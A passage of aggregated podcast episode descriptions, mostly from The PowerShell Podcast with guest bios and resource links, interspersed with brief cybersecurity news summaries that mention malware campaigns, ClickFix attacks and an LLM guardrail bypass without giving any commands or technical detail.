ways some of these encryption algos have been broken lately.Microsoft's new Copilot Actions can autonomously edit user files but openly warns it's vulnerable to hijacking that enables data theft or malware installation. Sweet, right?U.S. Cyber Command quietly awarded millions to a stealth startup building fully autonomous AI agents designed for large-scale offensive cyberattacks. The twist is that they are not writing code to help AI help people, in this case it's code to help AI. Why bother with the slow middle man?Researchers unveiled EchoGram, a subtle token trick that silently disables safety guardrails on GPT-4, Claude, Gemini, and nearly every major LLM. Guardrails. Great concept, but not so much in practice.

Recorded live from SpiceWorld 2025 in Austin, Texas, this special PowerShell Podcast bar session brings together community members Jeffery Hayes, Stephen Engler, Sean Wheeler, and Steven Judd for a fun and insightful celebration of PowerShell and community. Host Andrew Pla reflects on reaching the 200-episode milestone while sharing stories about growth, learning, and the value of connection. From early PowerShell journeys to the power of conferences, mentorship, and even a few bar-side life lessons, this lively session captures the heart of the PowerShell community.   Key Takeaways: Community is everything – Attending conferences and connecting with peers accelerates growth, provides mentorship, and reminds you that learning is a shared journey. Learn by doing and asking – Don't fear mistakes or questions; curiosity and collaboration are the real career accelerators. AI, documentation, and PowerShell's future – The guests discuss Copilot, parameter validation, and the need for high-quality documentation to improve the next wave of AI-assisted development. Guests: Stephen Engler, Jeffery Hayes, Sean Wheeler, Steven Juddhttps://www.linkedin.com/in/stephen-engler/ https://www.linkedin.com/in/jefferyhayescoa/ https://seanonit.org/ https://blog.stevenjudd.com/ https://andrewpla.tech/links   Resource Links: PowerShell Wednesdays – https://www.youtube.com/watch?v=lPoc8X7t0hY&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B PDQ Discord – https://discord.gg/PDQ Powershell.org– https://powershell.org Microsoft Learn PowerShell Docs – https://learn.microsoft.com/powershell Azure PowerShell Documentation – https://learn.microsoft.com/powershell/azure The PowerShell Podcast on YouTube: https://youtu.be/UrsbTkR6jg8

In this milestone 200th episode of The PowerShell Podcast, Frank Lesniak returns to chat with Andrew Pla about automation, community, and what it means to “bet on yourself.” Frank shares his experiences leading cybersecurity and enterprise architecture projects, using PowerShell for AWS security automation, and developing tools to simplify complex data exports. He also discusses the upcoming PowerShell Summit, his work with DuPage Animal Friends, and the value of giving back through mentorship, community involvement, and open source.   Key Takeaways: PowerShell in the cloud – Frank dives deep into AWS automation and explains how PowerShell can simplify security and configuration management at scale. From console to community – After years of speaking and mentoring, Frank emphasizes how collaboration and consistent effort lead to career growth and confidence. Giving back through leadership – As VP of DuPage Animal Friends, Frank highlights the power of using your professional skills for good beyond tech. Guest Bio: Frank Lesniak is a Sr. Cybersecurity & Enterprise Technology Architect at West Monroe, where he leads a 45-member team focused on Microsoft's M365/Modern Work platform. His team specializes in navigating the technical complexities of corporate M&A, executing at-scale divestitures and integrations centered on Azure, Microsoft 365, Entra ID, Active Directory, and Windows. An active contributor to the tech community, Frank is a published author, open-source contributor, and a frequent speaker at conferences and user groups on topics including PowerShell, artificial intelligence, and offbeat technical talks related to his hobbies. In his local community, he serves as the Vice President of DuPage Animal Friends, a non-profit dedicated to supporting DuPage County's sole open-admission animal shelter.   Resource Links: Connect with Frank -https://linktr.ee/franklesniak Frank Lesniak on X (Twitter) – https://x.com/FrankLesniak Frank on LinkedIn – https://linkedin.com/in/flesniak Connect with Andrew - https://andrewpla.tech/links DuPage Animal Friends – https://dupageanimalfriends.org Previous Podcasts with Frank - https://powershellpodcast.podbean.com/?s=Frank%20Lesniak PowerShell Wednesdays – YouTube Playlist PDQ Discord (PowerShell Scripting Channel) – https://discord.gg/PDQ PowerShell Summit OnRamp Scholarship – https://www.powershellsummit.org/on-ramp/ The PowerShell Podcast on YouTube: https://youtu.be/cQvs5s3T1DA

Binary Breadcrumbs: Correlating Malware Samples with Honeypot Logs Using PowerShell [Guest Diary] Windows, with PowerShell, has a great scripting platform to match common Linux/Unix command line utilities. https://isc.sans.edu/diary/Binary%20Breadcrumbs%3A%20Correlating%20Malware%20Samples%20with%20Honeypot%20Logs%20Using%20PowerShell%20%5BGuest%20Diary%5D/32454 RondoDox v2 Increases Exploits The RondoDox (or RondoWorm) added a substantial amount of new exploits to its repertoire. https://beelzebub.ai/blog/rondo-dox-v2/ Google Chrome Updates Google released an update for Google Chrome addressing five vulnerabilities. https://chromereleases.googleblog.com/2025/11/stable-channel-update-for-desktop.html Cisco Unified Contact Center Express Remote Code Execution Vulnerabilities Cisco patched two critical vulnerabilities in its Contact Center Express software. These vulnerabilities may lead to a full system compromise. https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-unauth-rce-QeN8h7mQ

Ever right-click the Start button and wonder why you sometimes see Command Prompt, other times PowerShell, or maybe something called Terminal? They look similar, but each has its own role.

Andrew's longtime friend, mentor, and PowerShell legend Josh King joins The PowerShell Podcast to celebrate the tenth anniversary and version 1.0 release of his popular open-source module BurntToast, which powers customizable Windows toast notifications. Josh shares the story behind the project's evolution, the challenges of maintaining an open-source module with millions of downloads, and the balance between community expectations and personal well-being.   In addition to diving into BurntToast's new actionable notifications and real-world use cases, Josh and host Andrew Pla reflect on their shared history in the PowerShell community, the importance of mentorship, and how taking small steps (like creating a GitHub repo or sharing a script) can lead to huge career growth.   Key Takeaways: BurntToast hits version 1.0 – After ten years of development, BurntToast now includes support for actionable notifications, letting users interact directly through PowerShell-based Windows alerts. Open-source and burnout – Josh discusses the pressures of maintaining a high-profile module and the importance of setting boundaries while giving back to the community. Mentorship and community matter – Simple encouragement, open sharing, and small contributions can transform careers and strengthen the PowerShell ecosystem. Guest Bio: Josh is a Senior Infrastructure Operations Engineer at Chocolatey Software and a former Microsoft MVP. He has a long history working within Windows and VMware environments and has a passion for all things PowerShell and automation.Resource Links BurntToast Module (PowerShell Gallery) – https://www.powershellgallery.com/packages/BurntToast Josh's Blog – https://toastit.dev Josh King on GitHub – https://github.com/Windos Connect with Andrew - https://andrewpla.tech/links Josh on BlueSky – https://bsky.app/profile/toastit.dev Josh's PowerShell Wednesday BurntToast Presentation - https://www.youtube.com/watch?v=XD1VaxXWcXA Learn about #requires - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_requires?view=powershell-7.5 PDQ Discord – https://discord.gg/PDQ The PowerShell Podcast on YouTube: https://youtu.be/wi7Ijo9Od-k

Microsoft MVP Hailey Phillips joins The PowerShell Podcast to share her journey from systems engineer to automation innovator. She talks about IntuneStack, her new PowerShell-driven CI/CD project for Intune environments, and how it bridges the gap between systems engineering and DevOps. Hailey also reflects on her path to becoming an MVP, her experiences at MMS, and the importance of mentorship, collaboration, and authenticity in the tech community.   Key Takeaways: Bridging systems and DevOps – Hailey's IntuneStack helps IT pros apply DevOps principles like CI/CD and Infrastructure as Code to Intune environments. Automate and empower – True success in automation means enabling your team, not bottlenecking them. Collaboration beats perfectionism. Community and authenticity – Sharing knowledge, mentoring others, and showing up as your true self create lasting impact in the PowerShell ecosystem. Guest Bio: Hailey Phillips is a Systems Engineer, Microsoft MVP, and Professional Pokémon Trainer. She specializes in automation, endpoint management, and modern workplace strategy, bridging the gap between traditional IT and DevOps. Hailey's work focuses on building pragmatic, scalable solutions using tools like PowerShell, Microsoft Graph, Intune, and Azure Arc. When she's not deep in tech, you'll probably find her skiing in the Cascades, lifting heavy things, or at a metalcore show with a strong cup of coffee in hand.   Resource Links: Intune Stack Project – https://github.com/AllwaysHyPe/IntuneStack Hailey's Website – https://www.allwayshype.com/ Hailey on BlueSky – https://bsky.app/profile/allwayshype.com Hailey on GitHub – https://github.com/AllwaysHyPe Hailey's "Rage Coding" Spotify Playlist: https://open.spotify.com/playlist/692CBjUNRBnSzSsRncQJkn?si=9d8bf7e625104ce8 PowerShell Wednesdays – https://www.youtube.com/watch?v=2-d16gi3VEc&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&pp=gAQB PDQ Discord – https://discord.gg/PDQ The PowerShell Podcast on YouTube: https://youtu.be/1YefrFekEJ

PowerShell community leader Constantin Hager joins The PowerShell Podcast to talk about his favorite tools and journey from discovering PowerShell to organizing user groups and speaking at major conferences. He talks about his early inspiration from PowerShell Conference Europe, his involvement with open-source projects like PSFramework and AutomatedLab, and how mentorship and community involvement shaped his career. Constantin also discusses building a portable VS Code setup for his company, leading a PowerShell team, and mentoring the next generation of IT professionals.   Key Takeaways: Community growth through contribution – Open-source projects like PSFramework, DBAtools, and AutomatedLab thrive because of contributors like Constantin who share improvements and ideas. Mentorship and education matter – From supporting apprentices to running user groups, Constantin emphasizes the importance of helping others learn PowerShell and gain confidence. Innovation in the workplace – His work creating a custom portable VS Code environment shows how small automation ideas can scale into powerful company-wide tools. Guest Bio:   Constantin Hager is a PowerShell enthusiast, speaker, open-source contributor, and community organizer based in Germany.   Resource Links: PowerShell User Group Inn-Salzach – https://www.meetup.com/de-DE/powershell-usergroup-inn-salzach/ Speak at PSUG Inn-Salzach Konstantin Hager on LinkedIn – https://www.linkedin.com/in/constantin-hager/ Connect with Andrew: https://andrewpla.tech/links PSFramework – https://github.com/PowershellFrameworkCollective/psframework AutomatedLab – https://github.com/AutomatedLab/AutomatedLab PowerShell Universal AutomatedLab https://github.com/steviecoaster/PowerShellUniversal.Apps.AutomatedLab DBA Tools – https://dbatools.io PDQ Discord – https://discord.gg/PDQ Constantin on PS Wednesday - https://www.youtube.com/watch?v=lYbTlCrrrUQ The PowerShell Podcast on YouTube: https://youtu.be/eC6TlEfV3iA

Cybersecurity, automation, and PowerShell advocate Adil Leghari returns to The PowerShell Podcast to kick off Cybersecurity Month. Adil shares insights from his career journey: from PowerShell and automation to identity and now cloud security at Palo Alto Networks. He discusses creating tools like Cyberdle and QR Check, how AI is reshaping cybersecurity, and the importance of empathy, authenticity, and mentorship in tech and community life.   Key Takeaways: AI in cybersecurity – Adil explains how organizations can protect sensitive data and combat threats using AI Security Posture Management and why we must “fight AI with AI.” Personal projects with purpose – Tools like Cyberdle and QR Check show how small, open-source projects can educate users and strengthen security awareness. Human connection in tech – Adil emphasizes empathy, authenticity, and community as keys to building better workplaces, stronger teams, and more fulfilling careers. Guest Bio: Adil Leghari is a Cloud Solutions Architect at Palo Alto Networks, where he works on the Cortex Cloud platform. With over twenty years of IT experience, Adil's career spans PowerShell automation, identity management, repositories + packaging, and cloud security. A passionate community contributor and speaker, he is known for his open-source projects, approachable teaching style, and advocacy for authenticity and mentorship in the tech industry. He is a speaker, author, and a really kind human that I like a lot (Andrew wrote this)Resource   Links: Cyberdle (Cybersecurity Wordle Game) – https://cyberdle.adilio.ca QR Check (QR Code Security Tool) – https://qrcheck.ca GitHub Spec Kit: https://github.com/github/spec-kit Adil's GitHub – https://github.com/adilio Adil's Website – https://adilio.ca Adil on X/Twitter – https://twitter.com/adilio Adil on BlueSky – https://bsky.app/profile/adilio.ca Find Andrew: https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/watch?v=uWfSbuYnpFA&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B The PowerShell Podcast on YouTube: https://youtu.be/HpOeZ4LBq9s

Strengthen your security posture by moving groups and users from Active Directory to Microsoft Entra. This gives you seamless access for your teams, stronger authentication with MFA and passwordless options, and centralized visibility into risks across your environment. Simplify hybrid identity management by reducing dual overhead, prioritizing key groups, migrating users without disruption, and automating policies with Graph or PowerShell. Jeremy Chapman, Microsoft 365 Director, shows how to start minimizing your local directory and make Microsoft Entra your source of authority to protect access everywhere. ► QUICK LINKS: 00:00 - Minimize Active Directory with Microsoft Entra 00:34 - Build a Strong Identity Foundation 01:28 - Reduce Dual Management Overhead 02:06 - Begin with Groups 03:04 - Automate with Graph & Policy Controls 03:50 - Access packages 06:00 - Move user objects to be cloud-managed 07:03 - Automate using scripts or code 09:17 - Wrap up ► Link References Get started at https://aka.ms/CloudManagedIdentity Use SOA scenarios at https://aka.ms/usersoadocs Group SOA scenarios at https://aka.ms/groupsoadocs Guidance for IT Architects on benefits of SOA at https://aka.ms/SOAITArchitectsGuidance ► Unfamiliar with Microsoft Mechanics? As Microsoft's official video series for IT, you can watch and share valuable content and demos of current and upcoming tech from the people who build it at Microsoft. • Subscribe to our YouTube: https://www.youtube.com/c/MicrosoftMechanicsSeries • Talk with other IT Pros, join us on the Microsoft Tech Community: https://techcommunity.microsoft.com/t5/microsoft-mechanics-blog/bg-p/MicrosoftMechanicsBlog • Watch or listen from anywhere, subscribe to our podcast: https://microsoftmechanics.libsyn.com/podcast ► Keep getting this insider knowledge, join us on social: • Follow us on Twitter: https://twitter.com/MSFTMechanics • Share knowledge on LinkedIn: https://www.linkedin.com/company/microsoft-mechanics/ • Enjoy us on Instagram: https://www.instagram.com/msftmechanics/ • Loosen up with us on TikTok: https://www.tiktok.com/@msftmechanics

Newly minted Microsoft MVP Stephen Valdinger, known as Steviecoaster, joins The PowerShell Podcast to share his journey from IT admin to community mentor and automation advocate. He talks about discovering PowerShell through Exchange, the career-changing power of automation, and his work with AutomatedLab, PowerShell Universal, and WinUI Shell. Stevie also highlights the importance of mentoring, building community, and making PowerShell approachable for everyone.   Key Takeaways: PowerShell as a gateway: Learning PowerShell can unlock career growth, lead to better automation, and even spark new opportunities like blogging, mentoring, and conference speaking. Tools for learning and labs: AutomatedLab, paired with Stevie's utilities and GUI work, provides a powerful way to build test environments and gain hands-on experience. Community and mentorship matter: Sharing knowledge, mentoring beginners, and creating approachable tools not only help others grow but also strengthen your own skills. Guest Bio: Steven Valdinger (Steviecoaster) is a Microsoft MVP, Customer Success Manager at Chocolatey, and community leader with a passion for automation and mentoring. With years of experience in IT, Stevie has become known for his approachable teaching style, and his contributions to open source. He is also a frequent contributor to community discussions, blogs at steviecoaster.dev, and presents at events like PowerShell Wednesdays and PowerShell Summit.   Resource Links: Steviecoaster's Blog: https://steviecoaster.dev Steviecoaster on BlueSky: https://bsky.app/profile/steviecoaster.dev Steviecoaster on GitHub: https://github.com/steviecoaster Connect with Andrew: https://andrewpla.tech/links Stevie's AutomatLab UI: https://github.com/steviecoaster/PowerShellUniversal.Apps.AutomatedLab AutomatedLab: https://github.com/AutomatedLab/AutomatedLab PowerShell Universal (by Ironman Software): https://ironmansoftware.com/powershell-universal WinUI Shell: https://github.com/mdgrs1/WinUI-Shell PDQ Discord: https://discord.gg/PDQ Stevie's PowerShell Wednesday WinUIShell talk: https://www.youtube.com/watch?v=PE1hy0VZXes&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&index=5 The PowerShell Podcast on YouTube: https://youtu.be/iKYfZBakoBI The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast 

CISA furloughs most of its workforce due to the government shutdown. The U.S. Air Force confirms it is investigating a SharePoint related breach. Google warns of a large-scale extortion campaign targeting executives. Researchers uncover Android spyware campaigns disguised as popular messaging apps. An extortion group claims to have breached Red Hat's private GitHub repositories. A software provider for recreational vehicle and power sport dealers suffers a ransomware breach. Patchwork APT deploys a new Powershell loader using scheduled tasks for persistence. A Tennessee Senator urges aggressive U.S. action to prepare for a post-quantum future. Cynthia Kaiser,  SVP of Halcyon's Ransomware Research Center and former Deputy Assistant Director at the FBI's Cyber Division, joins us with insights on the government shutdown. A Malaysian man pleads guilty to supporting a massive crypto fraud. Protected health info is not a marketing tool.  Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Cynthia Kaiser,  SVP of Halcyon's Ransomware Research Center and former Deputy Assistant Director at the FBI's Cyber Division, joins us with insights on the government shutdown. Selected Reading Shutdown guts U.S. cybersecurity agency at perilous time (CISA) Air Force admits SharePoint privacy issue; reports of breach (The Register) Google warns executives are being targeted for extortion with leaked Oracle data (IT Pro) Researchers uncover spyware targeting messaging app users in the UAE (The Record) Red Hat confirms security incident after hackers claim GitHub breach (Bleeping Computer) 766,000 Impacted by Data Breach at Dealership Software Provider Motility (Security Week) Patchwork APT: Leveraging PowerShell to Create Scheduled Tasks and Deploy Final Payload (GB Hackers) GOP senator confirms pending White House quantum push, touts legislative alternatives (CyberScoop) Bitcoin Fixer Convicted for Role in Money Laundering Scheme (Bank Infosecurity) Nursing Home Fined $182K for Posting Patient Photos Online  (Bank Infosecurity) Share your feedback. What do you think about CyberWire Daily? Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

Thomas Rayner joins The PowerShell Podcast to share his journey from sysadmin and PowerShell MVP to securing Microsoft 365 as a security professional at Microsoft. He reflects on how PowerShell accelerated his career, the importance of blogging and community involvement, and why clear communication with managers is vital for growth. Thomas also offers advice for beginners, highlighting patience, persistence, and the value of mentorship in tech.   Key Takeaways: PowerShell as a force multiplier: Automating repetitive tasks with PowerShell helped Thomas advance his career and opened the door to opportunities at Microsoft. Career growth requires communication: Being candid with managers, demonstrating value, and asking for resources to learn are key to advancement. Community and mentorship matter: Involvement in the PowerShell community, saying yes to opportunities, and supporting peers can transform both careers and personal growth. Guest Bio: Thomas Rayner is a security professional at Microsoft, where he focuses on preventative security solutions in Microsoft 365. A former Microsoft MVP in Cloud and Datacenter Management, Thomas built his career by blogging, speaking, and contributing to the PowerShell community. Originally from Edmonton, Canada, he used PowerShell to accelerate his early career as a sysadmin before moving into security roles at Microsoft. Today, he continues to share career wisdom, mentor others, and advocate for growth mindset thinking in tech.   Resource Links: Thomas Rayner's Blog: https://thomasrayner.ca Thomas Rayner on LinkedIn: https://www.linkedin.com/in/thomasrayner/ Thomas Rayner on GitHub: https://github.com/tlrayner Connect with Andrew: https://andrewpla.tech/links PDQ Discord: https://discord.gg/PDQ The PowerShell Podcast on YouTube: https://youtu.be/3H-tMKqlSOs The PowerShell Podcast hub page: The PowerShell Podcast: https://pdq.com/the-powershell-podcast 

Got a question or comment? Message us here!In this episode of The #SOCBrief, we break down the rising FileFix attack, a new social engineering technique using steganography to deliver info-stealing malware. Learn how attackers disguise malicious PowerShell commands, the risks this poses for browsers, messengers, and crypto wallets, and the proactive defenses SOCs can use to detect and contain these threats before they escalate into larger breaches.Support the showWatch full episodes at youtube.com/@aliascybersecurity.Listen on Apple Podcasts, Spotify and anywhere you get your podcasts.

Patrick Meinecke, known as SeeminglyScience, joins host Andrew Pla to share his journey from sysadmin to joining the PowerShell team at Microsoft. He discusses his early community contributions, the inner workings of the PowerShell engine, and powerful but underused features like ETS and type converters. Patrick also highlights helpful modules such as PowerShell Run, ctypes, and Useful Argument Completers, while reflecting on the importance of community engagement and open source collaboration.   Key Takeaways: From community to Microsoft: Patrick's contributions to PowerShell Editor Services and GitHub repos helped pave the way for his role on the official PowerShell team. Hidden gems in PowerShell: Features like the Extendable Type System (ETS), type converters, and modules such as PowerShell Run, ctypes, and Useful Argument Completers unlock powerful possibilities. Community makes it stronger: Helping others, answering questions, and sharing knowledge not only grows the ecosystem but also helps contributors sharpen their own skills. Guest Bio: Patrick Meinecke, widely known as SeeminglyScience, is a software engineer on the PowerShell team at Microsoft. Before joining the team, he spent over 15 years in sysadmin and tech support roles and is a longstanding contributor to the PowerShell open-source community. Patrick is recognized for his deep technical expertise in the PowerShell engine, his contributions to PowerShell Editor Services, and his passion for solving complex problems. He remains an active community member, often engaging on Discord and GitHub to help others learn and grow.   Resource Links: Patrick Meinecke on GitHub (@SeeminglyScience): https://github.com/SeeminglyScience Connect with Andrew: https://andrewpla.tech/links PowerShell Run (module by MDGRS): https://github.com/nbgrs/PowerShellRun Useful Argument Completers (module by MartinGC94): https://github.com/MartinGC94/UsefulArgumentCompleters ctypes (module by Jordan Borean): https://github.com/jborean93/PSctypes Spectre.Console for PowerShell (community project): https://github.com/PoshCode/PSSpectreConsole Join the PDQ Discord: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/Zyj1IdZFf1E The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast

Today we are joined by Nati Tal, Head of Guardio Labs, discussing their work “CAPTCHAgeddon” or unmasking the viral evolution of the ClickFix browser-based threat. CAPTCHAgeddon — Shaked Chen's deep dive into the ClickFix fake-captcha wave — reveals how a red-team trick morphed into a dominant, download-free browser threat that tricks users into pasting clipboard PowerShell/shell commands and leverages trusted infrastructure, including Google Scripts. Guardio's DBSCAN-based payload clustering exposes distinct attacker toolkits and distribution paths — from malvertising and compromised WordPress to social posts and Git repos — and argues defenders need behavioral, intelligence-driven protections, not just signatures. The research can be found here: “CAPTCHAgeddon” Unmasking the Viral Evolution of the ClickFix Browser-Based Threat Learn more about your ad choices. Visit megaphone.fm/adchoices

Today we are joined by Nati Tal, Head of Guardio Labs, discussing their work “CAPTCHAgeddon” or unmasking the viral evolution of the ClickFix browser-based threat. CAPTCHAgeddon — Shaked Chen's deep dive into the ClickFix fake-captcha wave — reveals how a red-team trick morphed into a dominant, download-free browser threat that tricks users into pasting clipboard PowerShell/shell commands and leverages trusted infrastructure, including Google Scripts. Guardio's DBSCAN-based payload clustering exposes distinct attacker toolkits and distribution paths — from malvertising and compromised WordPress to social posts and Git repos — and argues defenders need behavioral, intelligence-driven protections, not just signatures. The research can be found here: “CAPTCHAgeddon” Unmasking the Viral Evolution of the ClickFix Browser-Based Threat Learn more about your ad choices. Visit megaphone.fm/adchoices

In this episode, host Andrew Pla welcomes back Steven Judd, Microsoft MVP, teacher, and longtime community contributor. Together, they dive into the theme of beginnings, from starting careers in IT, to first encounters with PowerShell, and the importance of resilience while navigating the “valley of despair” in learning. Steven shares his journey from music and business studies into technology, where curiosity, persistence, and a willingness to read the manuals shaped his career. The conversation also explores how community, conferences, and friendships have been essential to Steven's growth. From humorous “please clap” moments at Nano Conf to building lasting connections, Steven highlights the power of showing up authentically, persevering through challenges, and helping others along the way.Key Takeaways The Power of the Basics: Learning commands like Get-Command, Get-Help, and Get-Member (“the tripod”) forms the foundation of a strong PowerShell journey. Resilience in Learning: Navigating the “valley of despair” in tough topics like PowerShell, certificates, or regex is where growth happens. Persistence pays off. Community is Everything: From user groups to conferences, surrounding yourself with peers and mentors accelerates growth and helps combat imposter syndrome. Guest Bio Steven Judd is a Microsoft MVP, educator, and veteran PowerShell enthusiast who has been teaching and sharing knowledge in the community for many years. With a background that spans business, music, and IT, Steven brings a unique perspective on learning, resilience, and humor. Known for his approachable teaching style and dad jokes, Steven has helped countless professionals embrace automation, improve their skills, and find their place in the PowerShell community.Resource Links Steven Judd's Content Hub: https://shortcutyour.life Steven Judd on YouTube (PowerShell content): YouTube Search Steven Judd on X/Twitter (@StevenJudd): https://x.com/StevenJudd Steven Judd's Merch Store: https://store.stephenjudd.com PDQ Discord: https://discord.gg/PDQ Connect with Andrew: https://andrewpla.tech/links PowerShell Wednesdays (live community sessions): https://www.youtube.com/watch?v=8oesn0HgGxE&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B The PowerShell Podcast on YouTube: https://youtu.be/yu6RVPwp8KY The PowerShell Podcast hub: The PowerShell Podcast: https://pdq.com/the-powershell-podcast

I remember working at a large organization with a team of other IT Operations staffers. We rotated this one job every month amongst a few people, each taking turns, where we'd lose a day to update all the privileged passwords for our servers. This was before Managed Service Accounts and the cloud, when we were required to change these every 30 days and then store the new ones in an encrypted store. What struck me when I got stuck with this wasn't the requirement to change every 30 days; that seemed normal. The thing that bothered me was how manual this was. As a former developer, I wrote some scripts to automated this, pre-PowerShell, and make the task easier on my fellow sys admins. I had scripts to generate a password, change it in AD, then print the pwd to be copied into our secure storage (no API there). This ran in a loop so I didn't lose a whole day to changing password. Read the rest of Password Guidance

Microsoft MVP Emanuel Palm joins The PowerShell Podcast to share his journey from managing printers in Sweden to being a Microsoft MVP who is automating the cloud with PowerShell and Azure. He talks about building the AZAuth module for OAuth authentication, using GitHub Actions for CI/CD, and the importance of blogging and community involvement. Plus, Emanuel reveals his unique side hobby... roasting coffee!   Key Takeaways From printers to the cloud: Emanuel's career shows how PowerShell can open doors, from automating IT tasks to driving cloud automation and DevOps practices. Community and sharing matter: Blogging, presenting, and contributing help you grow your own understanding while creating opportunities for others. Automation and authentication: With tools like GitHub Actions and his AZAuth module, Emanuel demonstrates how to simplify workflows and securely interact with APIs. Guest Bio Emanuel Palm is a Microsoft MVP based in Sweden, where he is a consultant focused on Microsoft technologies and is active in the PowerShell community. Emanuel is the creator of the AZAuth module, a lightweight solution for handling OAuth authentication in PowerShell, and a frequent speaker at events like PowerShell Conference Europe. Beyond tech, Emanuel is a coffee enthusiast who even roasts his own beans as a side hobby.   Resource Links Emanuel's Blog: https://pipe.how GitHub – Emanuel Palm: https://github.com/palmemanuel X / BlueSky: @palmemanuel AZAuth Module on GitHub: https://github.com/PalmEmanuel/AzAuth Emanuel's PS Wednesday: https://www.youtube.com/watch?v=trP2LLDynA0 Arkanum Coffee (Emanuel's hobby project): https://arkanum.coffee PDQ Discord: https://discord.gg/pdq Connect with Andrew: https://andrewpla.tech/links The PowerShell Podcast on YouTube: https://youtu.be/-uHHGVH1Kcc The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast 

James Brundage returns to The PowerShell Podcast to talk about his new project, Turtle, which brings the classic concept of Turtle graphics into PowerShell. From simple shapes to fractals, animations, and more, James shows how PowerShell can be a powerful and fun tool for exploring programming concepts. Tune in for insights on the history of Turtle, its modern applications, and how it can inspire both new learners and seasoned pros.   Guest Bio: James Brundage is a Microsoft MVP who has been heavily involved in PowerShell for over 18 years. He is a former member of the PowerShell team, working there during v2 and v3. He now works as a consultant with Start-Automating, applying his PowerShell expertise to organizations to help solve large-scale problems all around the world. He also has a lot of great projects on GitHub and regularly shares his knowledge at user groups and conferences.   Resource Links: PSTurtle Project & Documentation: https://psturtle.com/ GitHub – Start-Automating: https://github.com/StartAutomating James Brundage on BlueSky (@MrPowerShell): https://bsky.app/profile/mrpowershell.com MrPowerShell.com: https://mrpowershell.com/ PowerShell Web Organization (for PowerShell + Web projects): https://github.com/PowerShellWeb Turtles in PowerShell talk: https://www.youtube.com/watch?v=o8l_bQRvMkg Follow Andrew: https://andrewpla.tech/links Join the PDQ Discord: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/oGG6bKXsdrg The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast

Maxime Lamothe-Brassard, Founder and CEO of LimaCharlie, and the Defender Fridays community sit down with Jared Atkinson and dive into BloodHound.Jared is a security researcher who specializes in Digital Forensics and Incident Response. Recently, he has been building and leading private sector Hunt Operations capabilities. In his previous life, Jared lead incident response missions for the U.S. Air Force Hunt Team, detecting and removing Advanced Persistent Threats on Air Force and DoD networks. Passionate about PowerShell and the open source community, Jared is the lead developer of PowerForensics, Uproot, and maintains a DFIR focused blog at www.invoke-ir.com.On Defender Fridays we delve into the dynamic world of information security, exploring its defensive side with seasoned professionals from across the industry. Our aim is simple yet ambitious: to foster a collaborative space where ideas flow freely, experiences are shared, and knowledge expands.Join the live discussions by registering at https://limacharlie.io/defender-fridays

Interesting Technique to Launch a Shellcode Xavier came across malware that PowerShell and the CallWindowProcA() API to launch code. https://isc.sans.edu/diary/Interesting%20Technique%20to%20Launch%20a%20Shellcode/32238 NX Compromised to Steal Wallets and Credentials The popular open source NX build package was compromised. Code was added that uses the help of AI tools like Claude and Gemini to steal credentials from affected systems https://semgrep.dev/blog/2025/security-alert-nx-compromised-to-steal-wallets-and-credentials/ Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed the Global Espionage System Several law enforcement and cybersecurity agencies worldwide collaborated to release a detailed report on the recent Volt Typhoon incident. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a

In this episode of the PowerShell Podcast, we're live from TechMentor at the Microsoft campus with two incredible guests: longtime advocate, educator, and PM on the PowerShell team at Microsoft - Jason Helmick and newcomer Troy Brown. This special episode captures the heart of community, innovation, and the transformative power of PowerShell—from seasoned insight to beginner breakthroughs. Jason drops serious knowledge on two game-changing technologies: AI Shell: Think ChatGPT, but built directly into your terminal. Learn how it enhances shell UX, assists with command building, explains parameters, and keeps you focused without switching contexts. DSC v3 (Desired State Configuration): Now fully cross-platform and decoupled from PowerShell, DSC v3 is lighter, more extensible, and suitable for everything from servers to IoT. Jason walks us through the evolution, real-world use cases (like flipping Windows from dark mode to light mode!), and what's next for the configuration platform.  Highlights: Microsoft's hidden campus lore, including a piece of the Berlin Wall! The evolution of PowerShell ReadLine and its impact on productivity AI Shell's support for OpenAI, Azure Copilot, ollama, Gemini, and even custom agents Exporting configs from existing machines—a long-awaited DSC feature Why DSC v3 might be the most developer- and sysadmin-friendly release yet The cultural backbone of the PowerShell team: being “scrappy” and driven by customer success Troy Brown's First TechMentor Experience First-time conference-goer Troy Brown shares his experience diving into PowerShell: How a PowerShell workshop with Sean Wheeler, Steven Judd, and Jason Helmick helped him finally understand modules The journey from using PDQ to push basic PowerShell scripts to deeper automation potential Navigating the learning curve with community support His message to fellow newcomers: “Don't take things personally, and embrace the journey.”   Resource Links: DSC v3 on GitHub Leanpub DSC v3 Book by Gijs https://leanpub.com/thedscv3handbook The Phoenix Project (book) (a must-read for IT pros) https://www.amazon.com/Phoenix-Project-DevOps-Helping-Business/dp/0988262592 https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/_f5oYxzkinI The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast

